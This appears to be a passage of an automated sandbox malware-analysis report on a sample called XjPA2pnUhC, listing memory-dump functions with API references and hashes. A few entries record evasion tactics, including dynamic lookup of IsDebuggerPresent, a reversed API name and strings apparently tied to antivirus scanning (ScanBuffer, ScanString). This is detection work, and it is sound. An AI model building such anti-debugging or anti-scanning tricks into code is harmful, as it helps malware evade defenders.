                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                          • Instruction ID: b804a348b608698bbbb2e8c2781b637fa2db5f407293c6688877f2db54f3a15e
                                                          • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                                          • Instruction Fuzzy Hash: EDF062324043106B8621EB5CE9C5D9A77DEFE89760BE4881DF148DB910DB35F8C08E64
                                                          Function 02980145 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 328COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __aulldiv
                                                          • String ID: LfF$\lC$NG
                                                          • API String ID: 3732870572-3385470295
                                                          • Opcode ID: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                          • Instruction ID: 60238a99c413e04c85f6684d51ed8ed58010d9cc15880b808b3020624fab1d71
                                                          • Opcode Fuzzy Hash: 2a6cbd74b7f1d7262aabe967babe0c7563b8d160d0352d0a7d413315700012c3
                                                          • Instruction Fuzzy Hash: 02B18D316083409FD724FB24C891AAEB7EAEFD4710F44492EF88A52290EF359949CF57
                                                          Function 029CD1EB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __dosmaperr
                                                          • String ID: H
                                                          • API String ID: 2332233096-2852464175
                                                          • Opcode ID: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                          • Instruction ID: 84b1667dae1cf147cdcbf0f8dc7708a9529f6f41199ac2c5d1526207c28b16dd
                                                          • Opcode Fuzzy Hash: 3e80e4deedef708004bf5c1f14aafc2c87dd9643035db764e93b071d2df20022
                                                          • Instruction Fuzzy Hash: 52A16932A141049FDF19EF68DC90BAD7BA5EF4A324F24026DE815DB3D1DB319812CB62
                                                          Function 029C2259 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 216COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __freea
                                                          • String ID: PkGNG
                                                          • API String ID: 240046367-263838557
                                                          • Opcode ID: 063005e08074a30aa5a7525b1a3cdd37634a4b88fb4996d08a0078e91088f893
                                                          • Instruction ID: 3fe877a56ebaa363eb291bc6727628ea5ec6a649b4bb751765561100d6bdd39a
                                                          • Opcode Fuzzy Hash: 063005e08074a30aa5a7525b1a3cdd37634a4b88fb4996d08a0078e91088f893
                                                          • Instruction Fuzzy Hash: 9351A672A10216ABDB258F64DC81EBF77AEEF84754F25462DFD08D6190DB34DC40CAA2
                                                          Function 0297FDD7 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 186COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • __EH_prolog.LIBCMT ref: 0297FDDC
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0297FEBD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Exception@8H_prologThrow
                                                          • String ID: \lC$y~E
                                                          • API String ID: 3222999186-3657841620
                                                          • Opcode ID: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                          • Instruction ID: c932e5f93f3afd27e17bc28e5d833a98ed15fe3bff4bb9beddbe0257365b2062
                                                          • Opcode Fuzzy Hash: 3108295a3ea490f6f4279643bcf91a98a4e8460a72a47f708dfbc03d5f7be2ca
                                                          • Instruction Fuzzy Hash: B9518E72900218AADF04FB64DD969ED777EEF90314F50026AE80AA7091EF349B4DCF91
                                                          Function 029C5CF9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free_strpbrk
                                                          • String ID: *?$.
                                                          • API String ID: 3300345361-3972193922
                                                          • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                          • Instruction ID: fedbea9b8829b6ba6037f23c74acd00a86157453d870b0adc4446e5ab34d945f
                                                          • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                                          • Instruction Fuzzy Hash: 7E518071E0021AAFDF14DFA8C880AEDBBB9EF88314F65816DD954E7340E771AA01CB51
                                                          Function 028FAB00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetThreadLocale.KERNEL32(?,00000000,028FACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 028FAB2F
                                                            • Part of subcall function 028FA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028FA7E2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Locale$InfoThread
                                                          • String ID: eeee$ggg$yyyy
                                                          • API String ID: 4232894706-1253427255
                                                          • Opcode ID: f777c2c475e87c9dd247fbdb4058b1ff7b35c06a2532dd3943ab38bcb166b699
                                                          • Instruction ID: d2a8c45e93efa8d9daa461101b0178439d294ffadf8057e3a27ab8c80e772c66
                                                          • Opcode Fuzzy Hash: f777c2c475e87c9dd247fbdb4058b1ff7b35c06a2532dd3943ab38bcb166b699
                                                          • Instruction Fuzzy Hash: A241F57D7041084BE7D9EB7C88902BFF3EBDB86224B504522D75AC3354EA78ED05CA26
                                                          Function 029081CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 36COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,0290823C,?,?,00000000,?,02907A7E,ntdll,00000000,00000000,02907AC3,?,?,00000000), ref: 0290820A
                                                            • Part of subcall function 02908274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,029082FC,?,?,00000000,00000000,?,02908215,00000000,KernelBASE,00000000,00000000,0290823C), ref: 029082C1
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 029082C7
                                                            • Part of subcall function 02908274: GetProcAddress.KERNEL32(?,?), ref: 029082D9
                                                          • GetModuleHandleA.KERNELBASE(?), ref: 0290821E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: HandleModule$AddressProc
                                                          • String ID: AeldnaHeludoMteG$KernelBASE
                                                          • API String ID: 1883125708-1952140341
                                                          • Opcode ID: 49ace51203f647a8c861bd1faa7076d2a716a2e7c265e67525ac8ed7bde4f0d9
                                                          • Instruction ID: 6f94c0220d397cd6ecd7fbc7ffcbc06d329dbb2c5545f7eb51a7c166033e8805
                                                          • Opcode Fuzzy Hash: 49ace51203f647a8c861bd1faa7076d2a716a2e7c265e67525ac8ed7bde4f0d9
                                                          • Instruction Fuzzy Hash: 21F09678B44708AFE740FFFCEC819AAB7EDFB8D7507514461B900D3690E670AE148A65
                                                          Function 029AC8C8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 029AC8D4
                                                            • Part of subcall function 029AC83D: std::exception::exception.LIBCONCRT ref: 029AC84A
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 029AC8E2
                                                            • Part of subcall function 029AD195: ___crtInitializeCriticalSectionEx.LIBCPMT ref: 029AD1A2
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalException@8InitializeSectionThrow___crtstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                          • String ID: !G$` G
                                                          • API String ID: 64778976-1850324976
                                                          • Opcode ID: a5f87e4ec28c6f1509e93140d5bb26fd2096d98fbde0f457b3520502c9e02379
                                                          • Instruction ID: e8ec3a9a4ebc6c116cafff1c2ccf58b86f1a5a60718cf1cd9997161547ad45ae
                                                          • Opcode Fuzzy Hash: a5f87e4ec28c6f1509e93140d5bb26fd2096d98fbde0f457b3520502c9e02379
                                                          • Instruction Fuzzy Hash: 20E0D836D10318379704B6BCAE009CA739DAD842147414037EA14EB150FBA88E4289D8
                                                          Function 0290F6E8 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(KernelBase,?,0290FAEB,UacInitialize,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,ScanString,02977380,0291B7B8,Initialize), ref: 0290F6EE
                                                          • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0290F700
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: IsDebuggerPresent$KernelBase
                                                          • API String ID: 1646373207-2367923768
                                                          • Opcode ID: 3be3feb8e0789bec6153f6645708d63e0af9b321e4206cb7f624442d47722dd0
                                                          • Instruction ID: dc9f69a3eed47f78f041f6dad3eb5734756ccfddcf4375a2b99a0e495e956700
                                                          • Opcode Fuzzy Hash: 3be3feb8e0789bec6153f6645708d63e0af9b321e4206cb7f624442d47722dd0
                                                          • Instruction Fuzzy Hash: B6D012A93503641DBE5072FC1CC4819038C999462D3300F20B232C64D3F9AAAA195117
                                                          Function 028FC474 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 16libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,0291D10B,00000000,0291D11E), ref: 028FC47A
                                                          • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 028FC48B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                          • API String ID: 1646373207-3712701948
                                                          • Opcode ID: bcbf88357c8224b8d99994ba3a20df7e6393957ebb16c5b37017d1e61ca86553
                                                          • Instruction ID: 2156ade97aa5391c89695d4feca638c6829e4bb4017bc917e8e15ae48b01285f
                                                          • Opcode Fuzzy Hash: bcbf88357c8224b8d99994ba3a20df7e6393957ebb16c5b37017d1e61ca86553
                                                          • Instruction Fuzzy Hash: 0CD05EECA4431A9AF7C0EEF6548063137988328310F00C866EB01D5201E7AA5514CF19
                                                          Function 029C07A0 Relevance: 6.4, APIs: 4, Instructions: 370COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                          • Instruction ID: 17adc197110b36588a71e7b22d1a82566b7d6dd61c07d783f2103aff8f8b80d8
                                                          • Opcode Fuzzy Hash: 99b9f95825b3d3947f98974b62c5657870841952fc290d3d865075dfb712b2e8
                                                          • Instruction Fuzzy Hash: 8CC13671904205EBDB25EF78CD44BAEBBBDEF85310F3441AED484A7250E7718A41CB92
                                                          Function 029C1614 Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __alldvrm$_strrchr
                                                          • String ID:
                                                          • API String ID: 1036877536-0
                                                          • Opcode ID: 741cce58a8cf82a0672f857150eda12be5e673117a3cfe047addc8b2d3899a0b
                                                          • Instruction ID: 80e1ddc6e61261331ff8647470bdc67e2056b9ea8d42fea3ab9a086c39cd4611
                                                          • Opcode Fuzzy Hash: 741cce58a8cf82a0672f857150eda12be5e673117a3cfe047addc8b2d3899a0b
                                                          • Instruction Fuzzy Hash: 3BA16C72A083869FE715CF18C8907AEBBE9EF55314F3845BDD5899B282C3348941CB5A
                                                          Function 029C4390 Relevance: 6.3, APIs: 4, Instructions: 300COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                          • Instruction ID: 898790d7280e621a4bf0bb920bf1dc620995719cdff69844f08d73959cfd7fc3
                                                          • Opcode Fuzzy Hash: 41332500f0008602d77d1c660e50033fd15bda36b9a02a1f3ccc300d02d52732
                                                          • Instruction Fuzzy Hash: B5C1F270E04289AFDB11EFA8C954BEDBBB9AF4A310F24519CE854A7391C7748941CF62
                                                          Function 028FE1E8 Relevance: 6.1, APIs: 4, Instructions: 115COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028FE297
                                                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028FE2B3
                                                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028FE32A
                                                          • VariantClear.OLEAUT32(?), ref: 028FE353
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ArraySafe$Bound$ClearIndexVariant
                                                          • String ID:
                                                          • API String ID: 920484758-0
                                                          • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                          • Instruction ID: b06ca0e2711e1ec10da47e732f5e37f83e086fb184712242c84192c9d3d3091b
                                                          • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                          • Instruction Fuzzy Hash: CE41F77DA012299FCBA2DB5DC894BC9B3BEAB49314F0441D5E64CE7221DA30AF818F55
                                                          Function 028FAD3C Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FAD59
                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FAD7D
                                                          • GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD98
                                                          • LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028FAE2E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileModuleName$LoadQueryStringVirtual
                                                          • String ID:
                                                          • API String ID: 3990497365-0
                                                          • Opcode ID: d01ee5e9669570de80b26e023d4110b6b3f74453344745f01ae4cb11bd3adc4b
                                                          • Instruction ID: 8d6bc3e98882ab8f3fd44986677416560e1c34d288e305bc11254b89b4889627
                                                          • Opcode Fuzzy Hash: d01ee5e9669570de80b26e023d4110b6b3f74453344745f01ae4cb11bd3adc4b
                                                          • Instruction Fuzzy Hash: A1416E7DA002589BDBA1DB68CC84BDAB7FDAB08310F4441E5A64CE7241EB74AF848F51
                                                          Function 028FAD3A Relevance: 6.1, APIs: 4, Instructions: 101COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualQuery.KERNEL32(?,?,0000001C), ref: 028FAD59
                                                          • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028FAD7D
                                                          • GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028FAD98
